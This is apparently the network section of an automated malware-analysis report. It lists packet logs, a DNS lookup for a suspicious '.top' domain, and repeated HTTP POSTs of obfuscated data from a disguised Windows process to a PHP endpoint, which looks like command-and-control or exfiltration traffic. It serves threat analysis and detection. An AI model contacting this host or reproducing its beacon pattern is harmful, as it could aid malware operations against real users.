                                                                Oct 11, 2024 01:38:00.535562038 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.540554047 CEST8050131188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.540572882 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.540623903 CEST5013180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.540695906 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.540853977 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.545650005 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.572911024 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.612183094 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.746114016 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.799686909 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.861069918 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.861887932 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.893716097 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:00.973467112 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:00.973520994 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.174685955 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.193567991 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.193588972 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.193603992 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.193670988 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.193684101 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.193738937 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.194319963 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.195614100 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.197670937 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.199331045 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.199407101 CEST5013280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.205001116 CEST8050132188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.209609985 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.209681988 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.529319048 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.549755096 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.554773092 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.554786921 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.554799080 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.637842894 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.644509077 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.644632101 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.649754047 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.649857044 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.650055885 CEST8050133188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.650073051 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.650315046 CEST5013380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.655119896 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.690488100 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.809458017 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.862294912 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.979834080 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.983118057 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.985095024 CEST8050134188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.988076925 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:01.988120079 CEST5013480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:01.993010998 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.000689983 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.006030083 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.018572092 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.023499012 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.023606062 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.120609999 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.221539021 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.307904005 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.349163055 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.354501963 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.354526997 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.354540110 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.409643888 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.413014889 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.415630102 CEST8050135188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.415736914 CEST5013580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.418297052 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.421077013 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.421320915 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.426374912 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.465923071 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.518486977 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.635659933 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.690314054 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.768934965 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.773345947 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.773907900 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.774075031 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.774225950 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.778798103 CEST8050136188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.778937101 CEST5013680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.779198885 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.779259920 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.779405117 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:02.784539938 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:02.886321068 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.005832911 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.135339975 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.141134024 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.146509886 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.146553993 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.146567106 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.147285938 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.152393103 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.234375000 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.245672941 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.245872974 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.250773907 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.284029961 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.482748032 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.486376047 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.486402988 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.486416101 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.504839897 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.505095005 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.505389929 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.510266066 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.510282993 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.599972010 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.600244999 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.603873014 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.604012966 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.605298042 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.605315924 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.605330944 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.609190941 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.609596014 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.859699011 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.904622078 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:03.906213045 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:03.911246061 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.004723072 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.007685900 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.012850046 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.012871027 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.012883902 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.019424915 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.019910097 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.025202036 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.025846958 CEST8050138188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.025953054 CEST5013880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.025985956 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.026077032 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.030977964 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.266458988 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.378293991 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.383337975 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.383580923 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.388931990 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.389619112 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.394128084 CEST8050137188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.394231081 CEST5013780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.394526958 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.394769907 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.394769907 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.399693966 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.471311092 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.612267017 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.644306898 CEST8050139188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:04.715851068 CEST5013980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:04.980977058 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:05.062931061 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:05.065668106 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:05.065793991 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:18.047895908 CEST5014080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:38:18.053245068 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:18.053293943 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:18.053323030 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:18.384768009 CEST8050140188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:38:18.440114021 CEST5014080192.168.2.5188.114.96.3

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 11, 2024 01:36:28.511725903 CEST5103953192.168.2.51.1.1.1
                                                                Oct 11, 2024 01:36:28.905275106 CEST53510391.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 11, 2024 01:36:28.511725903 CEST192.168.2.51.1.1.10x1ebeStandard query (0)863811cm.nyafka.topA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 11, 2024 01:36:28.905275106 CEST1.1.1.1192.168.2.50x1ebeNo error (0)863811cm.nyafka.top188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 11, 2024 01:36:28.905275106 CEST1.1.1.1192.168.2.50x1ebeNo error (0)863811cm.nyafka.top188.114.97.3A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • 863811cm.nyafka.top

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549760188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:28.918380022 CEST334OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 344
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:29.270709038 CEST344OUTData Raw: 00 05 04 02 06 00 01 07 05 06 02 01 02 00 01 05 00 07 05 0b 02 05 03 0a 00 06 0a 02 05 00 03 00 0f 04 07 0b 00 04 05 02 0b 07 04 0a 05 0a 04 03 07 02 0b 0d 0f 50 05 0a 06 57 07 0c 06 06 00 0f 05 01 0d 0e 00 05 06 03 0d 04 0d 03 0a 07 0d 06 04 0d
                                                                Data Ascii: PWWU\L~~cfNvaqBbfl|awsXk]`xU{x~hS^@tc]}u~V@{SfL}by
                                                                Oct 11, 2024 01:36:29.359807014 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:29.627648115 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IU%2Bo3HO38VzrsQF6xxMMawI%2B0UEy6tifAQcIh2M9j%2Fes%2FPPHu0NdhkGVzEbU13M5y7O4APTiTRK68tkP55T99kE6rnWFnfB%2FVMlQOqhLnu6ZXp5RKeKO1DUmnJ5zw6f%2F251eeuW9"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ecf3e3bde98-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 35 35 30 0d 0a 56 4a 7d 5e 7b 53 78 5e 78 5c 56 49 7c 4f 77 01 7e 67 5e 55 68 63 69 4f 7a 73 74 4d 6a 5b 63 59 77 73 57 0c 6e 71 65 03 75 48 52 4b 7d 61 78 01 55 4b 71 0c 77 5c 5a 5f 7c 5b 61 4d 7f 59 66 09 6c 76 7b 52 6a 05 7b 4a 75 04 61 05 76 71 54 59 7c 61 54 04 7d 52 56 09 7e 49 63 4a 76 76 7b 06 7c 5b 61 48 7d 59 62 58 78 67 6b 59 78 49 70 01 6f 0b 67 03 79 5c 5e 46 7b 05 66 4c 7f 59 6b 5b 6c 74 78 44 6a 5c 51 05 75 5f 60 48 7a 51 41 5b 68 67 67 53 7f 4f 79 09 76 52 55 5f 78 55 77 58 60 4e 5f 50 79 5f 61 49 7c 6c 6a 4c 7b 4f 7a 04 76 4d 55 06 62 72 60 41 74 58 6e 50 7e 5d 7a 06 60 62 6d 04 61 65 5e 09 7f 6f 76 5c 77 6f 6f 5d 7f 5a 7c 02 78 6f 73 03 7a 63 76 01 7c 6d 68 08 60 5e 7c 04 69 62 6e 09 7e 6e 7f 08 78 7e 7e 07 69 4c 7a 5f 7b 5d 46 51 7c 42 6c 0a 69 4e 74 40 69 74 6e 4e 6f 53 73 06 7b 72 7b 59 68 61 78 59 7e 49 60 55 6b 70 62 51 7a 73 74 4c 7f 62 7c 48 77 4d 57 51 7b 5c 79 44 77 76 52 06 7e 58 60 02 7e 76 5b 08 77 62 51 4b 7f 72 53 06 7f 67 6a 08 78 76 6c 40 7e 5d 7b 03 77 62 53 02 74 [TRUNCATED]
                                                                Data Ascii: 550VJ}^{Sx^x\VI|Ow~g^UhciOzstMj[cYwsWnqeuHRK}axUKqw\Z_|[aMYflv{Rj{JuavqTY|aT}RV~IcJvv{|[aH}YbXxgkYxIpogy\^F{fLYk[ltxDj\Qu_`HzQA[hggSOyvRU_xUwX`N_Py_aI|ljL{OzvMUbr`AtXnP~]z`bmae^ov\woo]Z|xoszcv|mh`^|ibn~nx~~iLz_{]FQ|BliNt@itnNoSs{r{YhaxY~I`UkpbQzstLb|HwMWQ{\yDwvR~X`~v[wbQKrSgjxvl@~]{wbStOqa~~l`C}IQuakH{\uG~^y{w^Nyw|B{mcFzr^xMbNlygpJ~\cNvqx~Bw|YhB|Om@vB|{BZw^nCya_}|T{qTuc]DuO^w_\@~`bOt\Sv[t||yt|pM^{lsx^vD|ShNvglL~bT}SO{}~A~\y}pplxpZ}wPxCkI{bx|_g~YQ|p[zc^L}blwsey_ywvxJ~vZ@viwbQI|Lu|grC{H^|swvbmLwau~ajH}|d}YuOs{r}}^mIygxLxwtxCkzbp{cr{]NZxo^
                                                                Oct 11, 2024 01:36:29.627715111 CEST723INData Raw: 7d 72 67 40 75 07 60 05 6a 42 7c 5f 7d 64 7b 54 68 71 61 4e 62 52 5e 06 7b 0a 67 5d 63 60 7a 41 79 62 71 01 7e 7c 62 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 59 6a 4e 76 71 69 01 76 65 51 52 68 42 7e 5f 74 52 6b 5e 7e 70 7c 01 7b 6f
                                                                Data Ascii: }rg@u`jB|_}d{ThqaNbR^{g]c`zAybq~|b_z\yvxBagx[L~JxYjNvqiveQRhB~_tRk^~p|{olZlcb||w^w_i[r@zSYQoaeZS[_P|kLaVwhRIKjugtGlaS}`Cat`UhlfKPqo@Qno]ZY~PV}rJYjkZWud^|qrTvrZ^}rbX|^yPyv`|`cHbbn^tqr]habjR|~IYa\{POr^icDT{oZWdSUTdISac
                                                                Oct 11, 2024 01:36:29.741601944 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 384
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:29.835189104 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:29.835593939 CEST384OUTData Raw: 50 53 5d 5a 54 5f 5d 55 5e 5a 55 58 51 5c 5a 5c 57 5d 58 5a 55 53 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]ZT_]U^ZUXQ\Z\W]XZUSQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]?[<X?'T2.8B*%\"+0=7$Q0%R)8<!";>#Y$/\*
                                                                Oct 11, 2024 01:36:30.091778994 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTRFqkI5gfUsSvjOSxOHyWak7k1NVPYvO2CWlLX3QCHPq24i%2Fexvuew2VMtIshIdn8ukcNzzK8EiJKdModfs1NbOIt5tSbpDvCt0JTxF2Dz0Ja7EnmlEvReyGqHf0RvWJ1tozQCl"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ed22f4ade98-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 3d 07 25 0e 37 00 05 5b 3b 0f 2c 10 3e 2e 21 04 3c 21 28 03 25 1d 20 01 2e 3f 39 56 23 2b 0e 14 29 02 2a 12 33 2f 2b 58 3f 31 2a 51 03 1b 39 1c 28 30 28 08 28 32 22 03 29 22 39 17 27 23 25 43 2a 3d 3d 54 24 10 08 58 36 0f 09 0a 2a 12 27 1e 2f 2b 02 1b 28 28 07 00 20 11 2a 5f 08 13 39 1e 3d 38 34 1e 21 27 39 15 22 13 3b 1f 21 39 21 0b 2a 39 26 57 24 55 20 1a 2c 22 09 00 34 01 30 09 35 02 29 0b 37 3d 0e 58 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y=%7[;,>.!<!(% .?9V#+)*3/+X?1*Q9(0((2")"9'#%C*==T$X6*'/+(( *_9=84!'9";!9!*9&W$U ,"405)7=X1"_")Q?TR0
                                                                Oct 11, 2024 01:36:30.288947105 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1916
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:30.382365942 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:30.386409998 CEST1916OUTData Raw: 50 58 5d 58 51 5c 58 54 5e 5a 55 58 51 5c 5a 5b 57 58 58 58 55 50 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]XQ\XT^ZUXQ\Z[WXXXUPQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9).<\<W2-0E(5<_58 (U)S44<'[!W*8@ !'>;#Y$/\*
                                                                Oct 11, 2024 01:36:30.655797005 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1u2Sw1UwigSxsj%2BzlBZh2IdP2yuxU45C7QBRqnTxbjVkCbQtvBPQhTHBAT0GW5WFGXg28EfA32IIzR41VA6kY8ikvf71KQaqjQdFEJpVi%2FhqgLy6H%2FnnqSFyK4fOOUUt%2Bde2FdRL"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ed59ab7de98-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 58 3e 07 32 1e 20 3d 33 5c 2c 57 3c 5f 2a 2d 3e 5e 28 0f 38 07 26 34 3b 59 2d 3c 3d 56 35 5d 2f 05 3d 3c 26 58 30 5a 24 00 28 21 2a 51 03 1b 3a 02 3f 0a 2f 1c 28 0b 39 5b 29 21 3d 5e 30 33 25 43 29 03 35 56 27 07 32 5f 22 1f 37 0e 3e 3f 2c 0c 2d 28 28 18 28 38 3e 5c 20 3b 2a 5f 08 13 3a 08 3e 16 23 09 22 24 3d 5e 35 03 38 0d 22 00 36 1a 29 07 2e 1d 24 55 2f 05 3b 1c 3c 58 23 3f 34 0f 21 2c 32 1d 21 3d 3c 5b 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'X>2 =3\,W<_*->^(8&4;Y-<=V5]/=<&X0Z$(!*Q:?/(9[)!=^03%C)5V'2_"7>?,-(((8>\ ;*_:>#"$=^58"6).$U/;<X#?4!,2!=<[%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549766188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:29.837759018 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2580
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:30.191776037 CEST2580OUTData Raw: 50 52 58 58 54 59 5d 51 5e 5a 55 58 51 55 5a 52 57 5a 58 58 55 56 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
